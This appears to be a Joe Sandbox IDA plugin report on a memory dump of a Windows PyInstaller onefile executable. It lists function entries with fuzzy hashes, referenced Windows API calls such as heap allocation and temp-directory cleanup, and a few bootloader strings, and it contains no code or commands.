                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                • Opcode ID: 70c2359866287a8af0a4a1e3854a8c08d461412c49f5f124f6ea19d8a31e21e5
                                                                                                                                                                                                                                • Instruction ID: eaa4f92098db5ceab421671e2924430a76dbedab0cc881e773f83c0052a21868
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70c2359866287a8af0a4a1e3854a8c08d461412c49f5f124f6ea19d8a31e21e5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF219131B1A692C6FE50BA226914BFA9641BF45BC4F8844B2EE4C87786CE7DE046D300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                • Instruction ID: 5fda741ed60c2f75a9b251f9c56737f9c01077fde5bd952a7e16aab3adea5f42
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C315E32A1A642C5E7117B55884137CA690BF80B95F4101B7EA9E873E2CF7CE443A721
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction ID: f7344cb9e2ea76d4fe83949f507f37fda568359b35c207305bd7c9b88fd69068
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19118131A1E641C6EA60BF11940417DE2A4BF85B84F4444BBEACCD7BA6CF3DE4426730
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction ID: e1df05bef77a0fb708d5bf18142f250b14fbfa5615653f89c831f10b78bd0afe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA219232A19A81C7DB61AF18D440379B6A0FBC4B54F144276E79DC76D9DF3DD8129B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction ID: f78d964dd6abb8bc6e64e550407cd9b5443691011ad7adfcb03fa73bb2ce5525
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F801C831A09741C1E544FF529900069E695BF85FE0F4846B2DE9C93BE6CE3CD5136310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE29390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6AAE245F4,00000000,00007FF6AAE21985), ref: 00007FF6AAE293C9
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00007FF6AAE26476,?,00007FF6AAE2336E), ref: 00007FF6AAE28EA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2592636585-0
                                                                                                                                                                                                                                • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                • Instruction ID: db77fc83576954e45af097229ee8deb6004607ec5d6478f15341df024abdcddd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D0C221F3624682FE54B777BA466399251BF89BC0F88D076EE4D83B5ADC3DC0424B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6AAE3B32A,?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A), ref: 00007FF6AAE3EBED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction ID: d51e6a0a7d2cfe21a71e037b417bbe03f5def5768c909041cfc425410657ee29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0F974B0B247C1FE6A766698552B992D57F88B80F4C55B2C94FC63E1EE1CE4836230
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6AAE30C90,?,?,?,00007FF6AAE322FA,?,?,?,?,?,00007FF6AAE33AE9), ref: 00007FF6AAE3D63A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction ID: d4c2057a39d9e271c64cd06b362230614237ef26fcb8dab0663a00d5e17e2e6c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F03A30A0A243C1FE553672588127891A46F847A0F080AB3D97EC52E1DE2DE482A520
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction ID: 2ae6a8ba60916e4bab8cb423c5292007305597ad804f8c17f686da115211ff08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED16632A0AB82C6EB10AF75E8542BD3764FF84758F4041B6DA5D83AA4DF3DD54AD700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE2842B
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284AE
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284CD
                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284DB
                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284EC
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284F5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction ID: 23c5310b11881e24e4e6afc2cb52b3d17275fed3a047c743c7373b3fa5a1b0be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C413031A0E683C6EE20BF64E4541BA6364FB94754F4402B3DA9DC2694EF3DD54B9740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction ID: af5cd6a2e31153b05192f2bcb66a57c9daf87a74bb6dac02355991e94c09ce5c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45313B72609B81CAEB609F64E8803EE6364FB84704F04407ADA4E87B94DF39D549D714
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45C45
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE45598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE455AC
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: HeapFree.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A95E
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A948: GetLastError.KERNEL32(?,?,?,00007FF6AAE42D22,?,?,?,00007FF6AAE42D5F,?,?,00000000,00007FF6AAE43225,?,?,?,00007FF6AAE43157), ref: 00007FF6AAE3A968
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6AAE3A8DF,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3A909
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE3A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6AAE3A8DF,?,?,?,?,?,00007FF6AAE3A7CA), ref: 00007FF6AAE3A92E
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45C34
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE455F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AAE4560C
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EAA
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45EBB
                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF6AAE45ECC
                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6AAE4610C), ref: 00007FF6AAE45EF3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4070488512-0
                                                                                                                                                                                                                                • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                • Instruction ID: a1c98466fc7462281b1a2e06b7e834d1e975dc445caaf0ddad56cf3300611eb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CD1AE32A0A242C7E720BF26D8411B96765FF84794F44807BEA4DC7B95DF3EE842A750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction ID: 9398c5f8e63f91439e77fe37059021460508afa35ffd84b28b754ab8074a1ebf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0831A332609F81C6EB20DF25E8802AE73A4FB88754F500176EA8D83B64DF3DC156DB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
